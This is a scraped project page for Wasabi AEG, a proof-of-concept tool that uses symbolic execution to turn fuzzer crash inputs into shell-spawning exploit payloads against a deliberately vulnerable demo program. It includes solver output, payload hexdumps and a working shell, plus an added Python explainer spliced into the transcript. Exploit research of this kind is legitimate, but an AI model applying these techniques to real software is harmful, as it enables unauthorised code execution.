
macaron-et / Wasabi Aeg

Yet another implementation of AEG (Automated Exploit Generation) using symbolic execution engine Triton.

Programming Languages

python
139335 projects - #7 most used programming language

Projects that are alternatives of or similar to Wasabi Aeg

CRAX
CRAX: software CRash analysis for Automatic eXploit generation
Stars: ✭ 44 (+91.3%)
Mutual labels:  exploit, symbolic-execution
K8cscan
K8Cscan: a large-scale intranet penetration scanner with a custom plugin architecture, covering information gathering, network asset discovery, vulnerability scanning, password brute forcing and vulnerability exploitation. The program uses multiple threads to batch-scan hosts across many IP ranges and C-class subnets of a large internal network. Current plugins include: C-class neighbouring-host scanning, subdomain scanning, FTP/MySQL/Oracle/MSSQL password brute forcing, Windows/Linux system password brute forcing, live host scanning, port scanning, web information probing, OS version probing, Cisco device scanning and more. It supports calling arbitrary external programs or scripts and integrates with Cobalt Strike.
Stars: ✭ 693 (+2913.04%)
Mutual labels:  exploit
Am I Affected By Meltdown
Meltdown Exploit / Proof-of-concept / checks whether system is affected by Variant 3: rogue data cache load (CVE-2017-5754), a.k.a MELTDOWN.
Stars: ✭ 549 (+2286.96%)
Mutual labels:  exploit
Herpaderping
Process Herpaderping proof of concept, tool, and technical deep dive. Process Herpaderping bypasses security products by obscuring the intentions of a process.
Stars: ✭ 614 (+2569.57%)
Mutual labels:  exploit
Heap Viewer
An IDA Pro plugin to examine the glibc heap, focused on exploit development
Stars: ✭ 574 (+2395.65%)
Mutual labels:  exploit
Awesome Symbolic Execution
A curated list of awesome symbolic execution resources including essential research papers, lectures, videos, and tools.
Stars: ✭ 634 (+2656.52%)
Mutual labels:  symbolic-execution
Anticheat Testing Framework
Framework to test any Anti-Cheat
Stars: ✭ 481 (+1991.3%)
Mutual labels:  exploit
Shellen
🌸 Interactive shellcoding environment to easily craft shellcodes
Stars: ✭ 799 (+3373.91%)
Mutual labels:  exploit
Spectre Attack
Example of using revealed "Spectre" exploit (CVE-2017-5753 and CVE-2017-5715)
Stars: ✭ 690 (+2900%)
Mutual labels:  exploit
Deepstate
A unit test-like interface for fuzzing and symbolic execution
Stars: ✭ 603 (+2521.74%)
Mutual labels:  symbolic-execution
Windows Kernel Exploits
windows-kernel-exploits: a collection of Windows privilege escalation vulnerabilities
Stars: ✭ 5,963 (+25826.09%)
Mutual labels:  exploit
Cve 2019 11708
Full exploit chain (CVE-2019-11708 & CVE-2019-9810) against Firefox on Windows 64-bit.
Stars: ✭ 581 (+2426.09%)
Mutual labels:  exploit
Joomscan
OWASP Joomla Vulnerability Scanner Project
Stars: ✭ 640 (+2682.61%)
Mutual labels:  exploit
Tigress protection
Playing with the Tigress binary protection. Break some of its protections and solve some of its challenges. Automatic deobfuscation using symbolic execution, taint analysis and LLVM.
Stars: ✭ 550 (+2291.3%)
Mutual labels:  symbolic-execution
Htshells
Self contained htaccess shells and attacks
Stars: ✭ 708 (+2978.26%)
Mutual labels:  exploit
Hack Tools
hack tools
Stars: ✭ 488 (+2021.74%)
Mutual labels:  exploit
Rop Tool
A tool to help you write binary exploits
Stars: ✭ 590 (+2465.22%)
Mutual labels:  exploit
Penetration Testing Tools
A collection of more than 140+ tools, scripts, cheatsheets and other loots that I have developed over years for Red Teaming/Pentesting/IT Security audits purposes. Most of them came handy on at least one of my real-world engagements.
Stars: ✭ 614 (+2569.57%)
Mutual labels:  exploit
Xattacker
X Attacker Tool ☣ Website Vulnerability Scanner & Auto Exploiter
Stars: ✭ 897 (+3800%)
Mutual labels:  exploit
Oscp
Collection of things made during my OSCP journey
Stars: ✭ 709 (+2982.61%)
Mutual labels:  exploit

Wasabi AEG

This is yet another implementation of AEG (Automated Exploit Generation) using the symbolic execution engine Triton, and it is just a proof of concept.

This project is inspired by the following research.

Presentations

  • Girls Meets Symbolic Execution: Assertion 2. Automated Exploit Generation (at the 14th カーネル/VM探検隊 (Kernel/VM Tankentai) meetup) [Japanese, English]

Requirements

  • Triton and Pin tracer
    • NOTE: My Triton build number is 1380 (v0.6). Triton's API is volatile, so the solver scripts may need patches in the future.
  • lief
  • Python2

Build

You must build sample vulnerable programs.

cd vuln-samples
make
cd -

Demo

Demo applications are located in vuln-samples.

notes

🎉 Demo video (asciinema) 📷 is available here!

notes has a buffer overflow bug and contains shellcode in its instant_win() function.

We can obtain a crash input using AFL and feed it into notes. We found that notes crashes at address 0x7ffff7a8c231.

K_atc% xxd vuln-samples/result-notes/crashes/id:000004,sig:07,src:000000,op:havoc,rep:32
00000000: 6ef8 5d69 74e9 6d0d 320a 730a 750a 330a  n.]it.m.2.s.u.3.
00000010: 6e6c 65ff 68ff ff6f 8121 212e 7a81 2121  nle.h..o.!!.z.!!
00000020: 20d5 0a63 6e6e 2120 d50a 636e 6e66 adad   ..cnn! ..cnnf..
00000030: adad 66ad adad adad adad ad22 adad adad  ..f........"....
00000040: adad ad9d adad adad 0d51 0a73 0a75 0a33  .........Q.s.u.3
00000050: 0a6e 6c65 ff28 ffff 6f81 2121 20d5 0a63  .nle.(..o.!! ..c
00000060: 6e6e 6e6e 6e81 e16e 6e6e 6e6e 7e6e 6e6f  nnnnn..nnnnn~nno
00000070: 6e21 ff00 730a 71                        n!..s.q
gdb-peda$ r < result-notes/crashes/id:000004,sig:07,src:000000,op:havoc,rep:32

[----------------------------------registers-----------------------------------]
... snipped ...
RBP: 0xadad9dadadadadad 
... snipped ...
[-------------------------------------code-------------------------------------]
... snipped ...
=> 0x7ffff7a8c231 <__GI__IO_getline_info+193>:  mov    BYTE PTR [rbp+0x0],al
... snipped ...
Stopped reason: SIGBUS
0x00007ffff7a8c231 in __GI__IO_getline_info () from /usr/lib/libc.so.6

Generate the exploit payload as follows.

K_atc% export CRASHED_AT=0x7ffff7a8c231

K_atc% time ~/project/pin-2.14-71313-gcc.4.4.7-linux/source/tools/Triton/build/triton solve-notes.py vuln-samples/notes < vuln-samples/result-notes/crashes/id:000004,sig:07,src:000000,op:havoc,rep:32
... snipped ...
[TT] Solving Memory Access constriant...
[TT] Model for Memory Access: {64L: SymVar_64 = 0x60, 65L: SymVar_65 = 0x0, 66L: SymVar_66 = 0x0, 67L: SymVar_67 = 0x0, 68L: SymVar_68 = 0x0, 69L: SymVar_69 = 0x0, 95L: SymVar_95 = 0x10, 62L: SymVar_62 = 0xD8, 63L: SymVar_63 = 0x30}
~~~~~~~~
Found exploitable crash:  'n\x00\xf5\xf5\xf5\xf5\xf5\xf5\xf5\n\xf5\nu\x009:n\x00\xf5\xf5\xf5\xf5\xf5\xf5\xf5\xf5\xf5\xf5\xf5\xf5\xf5\xf5\xf5\xf5\n\xf5\xf5\xf5\xf5\xf5\xf5\n\xf8\x00n\x00\xf5\xf5\xf5\xf5\xf5\xf5\xf5\xf5\xf5\xf5\xf5\xf5\xf5\xf5\xf5\xf5\xd80`\x00\x00\x00\x00\x00\xf5\xf5\xf5\xf5\n\xf5\nu\x001:\xf5\xf5\xf5\xf5\xf5\xf5\xf5\xf5\xf5\xf5\xf5\xf5\xf5\n\x10'
Crash inputs: 'n\xf8]it\xe9m\r2\ns\nu\n3\nnle\xffh\xff\xffo\x81!!.z\x81!! \xd5\ncnn! \xd5\ncnnf\xad\xad\xad\xadf\xad\xad\xad\xad\xad\xad\xad\xad"\xad\xad\xd80`\x00\x00\x00\x00\x00\xad\xad\rQ\ns\nu\n3\nnle\xff(\xff\xffo\x81!! \xd5\n\x10'
[TT] Reading remaining stdin...
    read stdin = ''nnnnn\x81\xe1nnnnn~nnon!\xff\x00s\nq''
[TT] crash input is saved as 'crash_inputs'
[TT] Go on to phase 2
~/project/pin-2.14-71313-gcc.4.4.7-linux/source/tools/Triton/build/triton   <  106.72s user 5.79s system 99% cpu 1:53.21 total

K_atc% time ~/project/pin-2.14-71313-gcc.4.4.7-linux/source/tools/Triton/build/triton solve-notes-phase-2.py vuln-samples/notes < crash_inputs
... snipped ...
~~~~~~~~
[TT] Automated Exploit Generation Done. Saving payload as 'exploit-payload'
[TT] Model for Memory Access: {96L: SymVar_96 = 0x12, 97L: SymVar_97 = 0x40, 98L: SymVar_98 = 0x0, 99L: SymVar_99 = 0x0, 100L: SymVar_100 = 0x0, 101L: SymVar_101 = 0x0, 102L: SymVar_102 = 0x0, 95L: SymVar_95 = 0x10}
Crash Inputs: 'n\xf8]it\xe9m\r2\ns\nu\n3\nnle\xffh\xff\xffo\x81!!.z\x81!! \xd5\ncnn! \xd5\ncnnf\xad\xad\xad\xadf\xad\xad\xad\xad\xad\xad\xad\xad"\xad\xad\xd80`\x00\x00\x00\x00\x00\xad\xad\rQ\ns\nu\n3\nnle\xff(\xff\xffo\x81!! \xd5\n\x10\x12@\x00\x00\x00\x00\x00nnnnn~nnon!\xff\x00s\nq'
To test payload: `(cat exploit-payload -) | ./vuln-samples/notes`
[TT] End
~/project/pin-2.14-71313-gcc.4.4.7-linux/source/tools/Triton/build/triton   <  69.77s user 6.09s system 99% cpu 1:16.34 total

Finally, we got an exploit payload that spawns a shell, and it works fine!

K_atc% xxd exploit-payload 
00000000: 6ef8 5d69 74e9 6d0d 320a 730a 750a 330a  n.]it.m.2.s.u.3.
00000010: 6e6c 65ff 68ff ff6f 8121 212e 7a81 2121  nle.h..o.!!.z.!!
00000020: 20d5 0a63 6e6e 2120 d50a 636e 6e66 adad   ..cnn! ..cnnf..
00000030: adad 66ad adad adad adad ad22 adad d830  ..f........"...0
00000040: 6000 0000 0000 adad 0d51 0a73 0a75 0a33  `........Q.s.u.3
00000050: 0a6e 6c65 ff28 ffff 6f81 2121 20d5 0a10  .nle.(..o.!! ...
00000060: 1240 0000 0000 006e 6e6e 6e6e 7e6e 6e6f  .@.....nnnnn~nno
00000070: 6e21 ff00 730a 71                        n!..s.q
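The two hexdumps above differ only at offsets 0x3e-0x45 and 0x5f-0x66, which are exactly the offsets named in the two `[TT] Model for Memory Access` lines: each SymVar_n in the solver output is the n-th byte read from stdin, so a model is a set of byte patches to the crash file. The following Python script is an added illustration of how to read that output; it is not part of the Wasabi AEG project. It parses the two model lines copied from the transcript, applies them to a constructed 0x77-byte stand-in for the crash file (the real crash bytes are not embedded), lists the changed offsets, and decodes each solved 8-byte region as a little-endian 64-bit value. The regex, the function names and the 64-bit decoding are my assumptions about the output format, not an API of the project.

```python
import re
import struct

# One "offset: SymVar_n = value" entry as printed by the solver scripts in the transcript.
# The "L" after the offset is Python 2's long-integer suffix; it is optional here so the
# parser also accepts the same output printed by Python 3. (Assumed format, from the page.)
_ENTRY = re.compile(r"(\d+)L?\s*:\s*SymVar_\d+\s*=\s*(0x[0-9A-Fa-f]+|\d+)")

# Copies of the two model lines shown in the demo transcript above.
PHASE1_MODEL_LINE = ("[TT] Model for Memory Access: {64L: SymVar_64 = 0x60, 65L: SymVar_65 = 0x0, "
                     "66L: SymVar_66 = 0x0, 67L: SymVar_67 = 0x0, 68L: SymVar_68 = 0x0, "
                     "69L: SymVar_69 = 0x0, 95L: SymVar_95 = 0x10, 62L: SymVar_62 = 0xD8, "
                     "63L: SymVar_63 = 0x30}")
PHASE2_MODEL_LINE = ("[TT] Model for Memory Access: {96L: SymVar_96 = 0x12, 97L: SymVar_97 = 0x40, "
                     "98L: SymVar_98 = 0x0, 99L: SymVar_99 = 0x0, 100L: SymVar_100 = 0x0, "
                     "101L: SymVar_101 = 0x0, 102L: SymVar_102 = 0x0, 95L: SymVar_95 = 0x10}")


def parse_model(line):
    """Turn a '[TT] Model for Memory Access: {...}' line into {stdin_offset: byte_value}."""
    model = {}
    for off, val in _ENTRY.findall(line):
        value = int(val, 0)
        if not 0 <= value <= 0xFF:
            raise ValueError("SymVar at offset %s is not a byte: %s" % (off, val))
        model[int(off)] = value
    if not model:
        raise ValueError("no SymVar assignments found in line")
    return model


def apply_model(data, model):
    """Return a copy of data with every modelled stdin offset overwritten.

    Each SymVar_n stands for the n-th byte read from stdin, so an offset past the
    end of the input is reported as an error instead of silently extending it."""
    out = bytearray(data)
    for off, value in model.items():
        if off >= len(out):
            raise ValueError("model refers to offset %d but input has %d bytes" % (off, len(out)))
        out[off] = value
    return bytes(out)


def changed_offsets(before, after):
    """List (offset, old_byte, new_byte) for every byte that differs between two inputs."""
    return [(i, b, a) for i, (b, a) in enumerate(zip(before, after)) if b != a]


def decode_le64(data, offset):
    """Read the 8 bytes at offset as a little-endian 64-bit integer."""
    return struct.unpack_from("<Q", data, offset)[0]


if __name__ == "__main__":
    # Constructed stand-in for the crash file: same length (0x77 bytes) as the one on the page.
    crash = b"A" * 0x77
    stage1 = apply_model(crash, parse_model(PHASE1_MODEL_LINE))
    stage2 = apply_model(stage1, parse_model(PHASE2_MODEL_LINE))
    for off, old, new in changed_offsets(crash, stage2):
        print("offset 0x%02x: 0x%02x -> 0x%02x" % (off, old, new))
    print("phase 1 region at offset 62 decodes to 0x%x" % decode_le64(stage2, 62))
    print("phase 2 region at offset 95 decodes to 0x%x" % decode_le64(stage2, 95))
```

Applied in order, the phase-1 model writes the value 0x6030d8 at stdin offset 62 (0x3e) and the phase-2 model writes 0x401210 at offset 95 (0x5f), which is what the `exploit-payload` hexdump shows at those offsets. Comparing the patched regions against the crash file this way is a quick check that a solver run changed only the bytes its model claims to have changed.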

K_atc% (cat exploit-payload -) | ./vuln-samples/notes
Exploit Me!!

---- [menu] ----

==== [note #3] ====
title: content: Congratz![Enter]
uname -a
Linux K_atc 4.17.2-1-ARCH #1 SMP PREEMPT Sat Jun 16 11:08:59 UTC 2018 x86_64 GNU/Linux
whoami
katc